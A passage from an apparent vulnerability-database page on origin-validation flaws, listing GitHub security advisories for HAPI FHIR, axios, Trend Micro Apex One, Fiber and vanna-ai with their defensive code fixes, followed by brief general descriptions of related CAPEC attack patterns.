`startsWith()` pattern in `ManagedWebAccess.isLocal()` could allow an attacker-controlled domain to be treated as \"local,\" bypassing the HTTPS enforcement.\n\n## Recommended Fix\n\nReplace the `startsWith()` check in `ManagedWebAccessUtils.getServer()` with proper URL host boundary validation:\n\n```java\npublic static ServerDetailsPOJO getServer(String url, Iterable\u003cServerDetailsPOJO\u003e serverAuthDetails) {\n if (serverAuthDetails != null) {\n for (ServerDetailsPOJO serverDetails : serverAuthDetails) {\n if (urlMatchesServer(url, serverDetails.getUrl())) {\n return serverDetails;\n }\n }\n }\n return null;\n}\n\n/**\n * Check if a URL matches a configured server URL with proper host boundary validation.\n * After the configured prefix, the next character must be \u0027/\u0027, \u0027?\u0027, \u0027#\u0027, \u0027:\u0027, or end-of-string.\n */\nprivate static boolean urlMatchesServer(String url, String serverUrl) {\n if (url == null || serverUrl == null) return false;\n if (!url.startsWith(serverUrl)) return false;\n if (url.length() == serverUrl.length()) return true;\n char nextChar = url.charAt(serverUrl.length());\n return nextChar == \u0027/\u0027 || nextChar == \u0027?\u0027 || nextChar == \u0027#\u0027 || nextChar == \u0027:\u0027;\n}\n```\n\nApply the same fix to `ManagedWebAccess.isLocal()` at line 214 and the three-argument `getServer()` overload at line 14.\n\nAdditionally, consider re-introducing the host-equality check for redirects in `SimpleHTTPClient` (as was previously implemented in commit `6b615880` but removed in `3871cc69`) to provide defense-in-depth against credential leakage on cross-origin redirects.",
"id": "GHSA-fgv2-4q4g-wc35",
"modified": "2026-03-31T18:55:21Z",
"published": "2026-03-30T17:19:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-fgv2-4q4g-wc35"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34359"
},
{
"type": "PACKAGE",
"url": "https://github.com/hapifhir/org.hl7.fhir.core"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "HAPI FHIR Core has Authentication Credential Leakage via Improper URL Prefix Matching on HTTP Redirect"
}
GHSA-FH7X-2848-JMPF
Vulnerability from github – Published: 2025-01-29 09:31 – Updated: 2025-01-29 12:31In axios before 1.7.8, lib/helpers/isURLSameOrigin.js does not use a URL object when determining an origin, and has a potentially unwanted setAttribute('href',href) call. NOTE: some parties feel that the code change only addresses a warning message from a SAST tool and does not fix a vulnerability.
{
"affected": [],
"aliases": [
"CVE-2024-57965"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-29T09:15:08Z",
"severity": "LOW"
},
"details": "In axios before 1.7.8, lib/helpers/isURLSameOrigin.js does not use a URL object when determining an origin, and has a potentially unwanted setAttribute(\u0027href\u0027,href) call. NOTE: some parties feel that the code change only addresses a warning message from a SAST tool and does not fix a vulnerability.",
"id": "GHSA-fh7x-2848-jmpf",
"modified": "2025-01-29T12:31:45Z",
"published": "2025-01-29T09:31:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57965"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/issues/6351"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/6714"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/0a8d6e19da5b9899a2abafaaa06a75ee548597db"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.7.8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FJP5-WX3V-FPRM
Vulnerability from github – Published: 2024-06-11 00:30 – Updated: 2024-06-11 00:30An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.
Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
This vulnerability is similar to, but not identical to, CVE-2024-36302.
{
"affected": [],
"aliases": [
"CVE-2024-36303"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-10T22:15:10Z",
"severity": "HIGH"
},
"details": "An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2024-36302.",
"id": "GHSA-fjp5-wx3v-fprm",
"modified": "2024-06-11T00:30:39Z",
"published": "2024-06-11T00:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36303"
},
{
"type": "WEB",
"url": "https://success.trendmicro.com/dcx/s/solution/000298063"
},
{
"type": "WEB",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-24-570"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FMG4-X8PW-HJHG
Vulnerability from github – Published: 2024-02-22 18:25 – Updated: 2024-02-26 15:48The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard ("*") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.
Impact
The impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references.
Proof of Concept
The code in cors.go allows setting a wildcard in the AllowOrigins while having AllowCredentials set to true, which could lead to various vulnerabilities.
Potential Solution
Here is a potential solution to ensure the CORS configuration is secure:
func New(config ...Config) fiber.Handler {
if cfg.AllowCredentials && cfg.AllowOrigins == "*" {
panic("[CORS] Insecure setup, 'AllowCredentials' is set to true, and 'AllowOrigins' is set to a wildcard.")
}
// Return new handler goes below
}
The middleware will not allow insecure configurations when using `AllowCredentials` and `AllowOrigins`.
Workarounds
For the meantime, users are advised to manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. The browser fetch api, browsers and utilities that enforce CORS policies are not affected by this.
References
MDN Web Docs on CORS Errors CodeQL on CORS Misconfiguration PortSwigger on Exploiting CORS Misconfigurations WhatWG CORS protocol and credentials
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/gofiber/fiber/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.52.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-25124"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-22T18:25:18Z",
"nvd_published_at": "2024-02-21T21:15:09Z",
"severity": "CRITICAL"
},
"details": "The CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (\"*\") while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices.\n\n## Impact\nThe impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references.\n\n## Proof of Concept\nThe code in cors.go allows setting a wildcard in the AllowOrigins while having AllowCredentials set to true, which could lead to various vulnerabilities.\n\n## Potential Solution\nHere is a potential solution to ensure the CORS configuration is secure:\n\n```go\nfunc New(config ...Config) fiber.Handler {\n if cfg.AllowCredentials \u0026\u0026 cfg.AllowOrigins == \"*\" {\n panic(\"[CORS] Insecure setup, \u0027AllowCredentials\u0027 is set to true, and \u0027AllowOrigins\u0027 is set to a wildcard.\")\n }\n // Return new handler goes below\n}\n\nThe middleware will not allow insecure configurations when using `AllowCredentials` and `AllowOrigins`.\n```\n\n## Workarounds\nFor the meantime, users are advised to manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. The browser fetch api, browsers and utilities that enforce CORS policies are not affected by this.\n\n## References\n[MDN Web Docs on CORS Errors](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials)\n[CodeQL on CORS Misconfiguration](https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials/)\n[PortSwigger on Exploiting CORS Misconfigurations](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n[WhatWG CORS protocol and credentials ](https://fetch.spec.whatwg.org/#cors-protocol-and-credentials)",
"id": "GHSA-fmg4-x8pw-hjhg",
"modified": "2024-02-26T15:48:31Z",
"published": "2024-02-22T18:25:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25124"
},
{
"type": "WEB",
"url": "https://github.com/gofiber/fiber/commit/f0cd3b44b086544a37886232d0530601f2406c23"
},
{
"type": "WEB",
"url": "https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials"
},
{
"type": "WEB",
"url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials"
},
{
"type": "WEB",
"url": "https://fetch.spec.whatwg.org/#cors-protocol-and-credentials"
},
{
"type": "PACKAGE",
"url": "https://github.com/gofiber/fiber"
},
{
"type": "WEB",
"url": "https://github.com/gofiber/fiber/releases/tag/v2.52.1"
},
{
"type": "WEB",
"url": "https://saturncloud.io/blog/cors-cannot-use-wildcard-in-accesscontrolalloworigin-when-credentials-flag-is-true"
},
{
"type": "WEB",
"url": "http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Fiber has Insecure CORS Configuration, Allowing Wildcard Origin with Credentials"
}
GHSA-FP27-Q2F5-PHX3
Vulnerability from github – Published: 2026-04-02 06:31 – Updated: 2026-04-02 06:31A flaw has been found in vanna-ai vanna up to 2.0.2. Affected by this issue is some unknown functionality of the component FastAPI/Flask Server. Executing a manipulation can lead to permissive cross-domain policy with untrusted domains. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-5321"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-02T05:16:05Z",
"severity": "MODERATE"
},
"details": "A flaw has been found in vanna-ai vanna up to 2.0.2. Affected by this issue is some unknown functionality of the component FastAPI/Flask Server. Executing a manipulation can lead to permissive cross-domain policy with untrusted domains. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-fp27-q2f5-phx3",
"modified": "2026-04-02T06:31:16Z",
"published": "2026-04-02T06:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5321"
},
{
"type": "WEB",
"url": "https://github.com/August829/CVEP/issues/14"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/780729"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354653"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354653/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
CAPEC-111: JSON Hijacking (aka JavaScript Hijacking)
An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website.
CAPEC-141: Cache Poisoning
An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.
CAPEC-142: DNS Cache Poisoning
A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.
CAPEC-160: Exploit Script-Based APIs
Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script> tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them.
CAPEC-21: Exploitation of Trusted Identifiers
An adversary guesses, obtains, or "rides" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.
CAPEC-384: Application API Message Manipulation via Man-in-the-Middle
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Adversary-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.
CAPEC-385: Transaction or Event Tampering via Application API Manipulation
An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.
CAPEC-386: Application API Navigation Remapping
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.
CAPEC-387: Navigation Remapping To Propagate Malicious Content
An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.
CAPEC-388: Application API Button Hijacking
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.
CAPEC-510: SaaS User Request Forgery
An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, "piggy-backing" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.
CAPEC-59: Session Credential Falsification through Prediction
This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
CAPEC-60: Reusing Session IDs (aka Session Replay)
This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.
CAPEC-75: Manipulating Writeable Configuration Files
Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
CAPEC-89: Pharming
A pharming attack occurs when the victim is fooled into entering sensitive data into supposedly trusted locations, such as an online bank site or a trading platform. An attacker can impersonate these supposedly trusted sites and have the victim be directed to their site rather than the originally intended one. Pharming does not require script injection or clicking on malicious links for the attack to succeed.